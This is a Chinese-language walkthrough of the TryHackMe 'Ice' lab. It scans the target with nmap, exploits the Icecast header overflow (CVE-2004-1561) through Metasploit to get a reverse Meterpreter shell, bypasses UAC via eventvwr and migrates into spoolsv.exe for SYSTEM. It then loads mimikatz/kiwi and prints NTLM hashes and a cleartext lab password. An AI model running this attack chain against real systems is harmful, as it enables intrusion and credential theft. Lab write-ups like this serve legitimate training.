【Tryhackme】Ice(bof)
免责声明
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。服务扫描
┌──(rootkali)-[~/tryhackme/ice]
└─# nmap -sV -Pn 10.10.121.62
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 00:43 EST
Stats: 0:01:08 elapsed;
0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done;
ETC: 00:44 (0:00:19 remaining)
Nmap scan report for 10.10.121.62
Host is up (0.30s latency).
Not shown: 988 closed ports
PORTSTATE SERVICEVERSION
135/tcpopenmsrpcMicrosoft Windows RPC
139/tcpopennetbios-ssnMicrosoft Windows netbios-ssn
445/tcpopenmicrosoft-dsMicrosoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcpopenssl/ms-wbt-server?
5357/tcpopenhttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcpopenhttpIcecast streaming media server
49152/tcp openmsrpcMicrosoft Windows RPC
49153/tcp openmsrpcMicrosoft Windows RPC
49154/tcp openmsrpcMicrosoft Windows RPC
49158/tcp openmsrpcMicrosoft Windows RPC
49159/tcp openmsrpcMicrosoft Windows RPC
49160/tcp openmsrpcMicrosoft Windows RPC
Service Info: Host: DARK-PC;
OS: Windows;
CPE: cpe:/o:microsoft:windows
看到开了很多端口,我们留意8000端口这个服务,在CVE Details显示存在一个
Execute CodeOverflow
漏洞,CVE编号为:CVE-2004-1561
在msf上搜索这个编号的漏洞利用模块:
msf6 > search CVE-2004-1561Matching Modules
================#NameDisclosure DateRankCheckDescription
----------------------------------------
0exploit/windows/http/icecast_header2004-09-28greatNoIcecast Header OverwriteInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
初始shell 设置参数,开始攻击,顺利拿到初始shell
msf6 exploit(windows/http/icecast_header) > set rhosts 10.10.121.62
rhosts => 10.10.121.62
msf6 exploit(windows/http/icecast_header) > set lhost tun0
lhost => tun0
msf6 exploit(windows/http/icecast_header) > run[*] Started reverse TCP handler on 10.13.21.169:4444
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.121.62:49302) at 2021-11-15 02:40:26 -0500meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.All rights reserved.C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\dark
使用
post/multi/recon/local_exploit_suggester
枚举提权模块meterpreter > run post/multi/recon/local_exploit_suggester[*] 10.10.121.62 - Collecting local exploits for x86/windows...
[*] 10.10.121.62 - 37 exploit checks are being tried...
[+] 10.10.121.62 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.121.62 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
我们选择
exploit/windows/local/bypassuac_eventvwr
这个提权模块,设置参数,进行提权msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > optionsModule options (exploit/windows/local/bypassuac_eventvwr):NameCurrent SettingRequiredDescription
--------------------------------------
SESSIONyesThe session to run this module on.Payload options (windows/meterpreter/reverse_tcp):NameCurrent SettingRequiredDescription
--------------------------------------
EXITFUNCprocessyesExit technique (Accepted: '', seh, thread, process, none)
LHOST192.168.3.67yesThe listen address (an interface may be specified)
LPORT4444yesThe listen portExploit target:IdName
------
0Windows x86msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > run[*] Started reverse TCP handler on 10.13.21.169:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 2 opened (10.13.21.169:4444 -> 10.10.121.62:49336) at 2021-11-15 03:12:02 -0500
[*] Cleaning up registry keys ...
meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.All rights reserved.C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\darkmeterpreter > getprivsEnabled Process Privileges
==========================Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
提权 我们的权限账号依然是
dark-pc\dark
,但是用getprivs
命令查看,显示现在已经拥有了SeTakeOwnershipPrivilege
的权限用PS命令列出目前靶机所有进程:
meterpreter > psProcess List
============ PIDPPIDNameArchSessionUserPath
------------------------------
00[System Process]
40Systemx640
4164smss.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\smss.exe
500692svchost.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe
544536csrss.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\csrss.exe
588692svchost.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe
592536wininit.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\wininit.exe
604584csrss.exex641NT AUTHORITY\SYSTEMC:\Windows\System32\csrss.exe
652584winlogon.exex641NT AUTHORITY\SYSTEMC:\Windows\System32\winlogon.exe
692592services.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\services.exe
700592lsass.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\lsass.exe
708592lsm.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\lsm.exe
816692svchost.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe
884692svchost.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\svchost.exe
932692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe
1056692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe
1136692svchost.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\svchost.exe
1224816slui.exex641Dark-PC\DarkC:\Windows\System32\slui.exe
1264692spoolsv.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exe
1328692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe
1408692taskhost.exex641Dark-PC\DarkC:\Windows\System32\taskhost.exe
1516692amazon-ssm-agent.exex640NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1528500dwm.exex641Dark-PC\DarkC:\Windows\System32\dwm.exe
15481508explorer.exex641Dark-PC\DarkC:\Windows\explorer.exe
1712692LiteAgent.exex640NT AUTHORITY\SYSTEMC:\Program Files\Amazon\Xentools\LiteAgent.exe
1720692sppsvc.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\sppsvc.exe
1752692svchost.exex640NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe
1804816WmiPrvSE.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\wbem\WmiPrvSE.exe
1892692Ec2Config.exex640NT AUTHORITY\SYSTEMC:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
21082300cmd.exex861Dark-PC\DarkC:\Windows\SysWOW64\cmd.exe
2124692svchost.exex640NT AUTHORITY\NETWORK SERVICEC:\Windows\System32\svchost.exe
2284604conhost.exex641Dark-PC\DarkC:\Windows\System32\conhost.exe
23001548Icecast2.exex861Dark-PC\DarkC:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2352692vds.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\vds.exe
2460692TrustedInstaller.exex640NT AUTHORITY\SYSTEMC:\Windows\servicing\TrustedInstaller.exe
2528692SearchIndexer.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\SearchIndexer.exe
25362092powershell.exex861Dark-PC\DarkC:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2916604conhost.exex641Dark-PC\DarkC:\Windows\System32\conhost.exe
留意这个进程:
1264692spoolsv.exex640NT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exe
这个进程与当前进程同样是x64架构。我们用
migrate -N
把进程迁移到这个进程当中,成功升级到系统最高权限。meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2536 to 1264...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
获取其他用户凭证 使用
load kiwi
命令收集系统里其他用户的凭证信息meterpreter > load kiwi
Loading extension kiwi...
.#####.mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##."A La Vie, A L'Amour" - (oe.eo)
## / \ ##/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##> http://blog.gentilkiwi.com/mimikatz
'## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
'#####'> http://pingcastle.com / http://mysmartlogon.com***/Success.
使用命令
help
查看支持的kiwi指令:Kiwi Commands
=============CommandDescription
------------------
creds_allRetrieve all credentials (parsed)
creds_kerberosRetrieve Kerberos creds (parsed)
creds_livesspRetrieve Live SSP creds
creds_msvRetrieve LM/NTLM creds (parsed)
creds_sspRetrieve SSP creds
creds_tspkgRetrieve TsPkg creds (parsed)
creds_wdigestRetrieve WDigest creds (parsed)
dcsyncRetrieve user account information via DCSync (unparsed)
dcsync_ntlmRetrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_createCreate a golden kerberos ticket
kerberos_ticket_listList all kerberos tickets (unparsed)
kerberos_ticket_purgePurge any in-use kerberos tickets
kerberos_ticket_useUse a kerberos ticket
kiwi_cmdExecute an arbitary mimikatz command (unparsed)
lsa_dump_samDump LSA SAM (unparsed)
lsa_dump_secretsDump LSA secrets (unparsed)
password_changeChange the password/hash of a user
wifi_listList wifi profiles/creds for the current user
wifi_list_sharedList shared wifi profiles/creds (requires SYSTEM)
使用
creds_all
命令打印出所有用户凭证:meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============UsernameDomainLMNTLMSHA1
------------------------
DarkDark-PCe52cac67419a9a22ecb08369099ed3027c4fe5eada682714a036e39378362bab0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0ebwdigest credentials
===================UsernameDomainPassword
----------------------
(null)(null)(null)
DARK-PC$WORKGROUP(null)
DarkDark-PCPassword01!tspkg credentials
=================UsernameDomainPassword
----------------------
DarkDark-PCPassword01!kerberos credentials
====================UsernameDomainPassword
----------------------
(null)(null)(null)
DarkDark-PCPassword01!
dark-pc$WORKGROUP(null)
【【Tryhackme】Ice(bof)】我们看到
dark
的登录密码是:Password01!
推荐阅读
- 宽容谁
- 我要做大厨
- 增长黑客的海盗法则
- 画画吗()
- 2019-02-13——今天谈梦想()
- 远去的风筝
- 三十年后的广场舞大爷
- 叙述作文
- 20190302|20190302 复盘翻盘
- 学无止境,人生还很长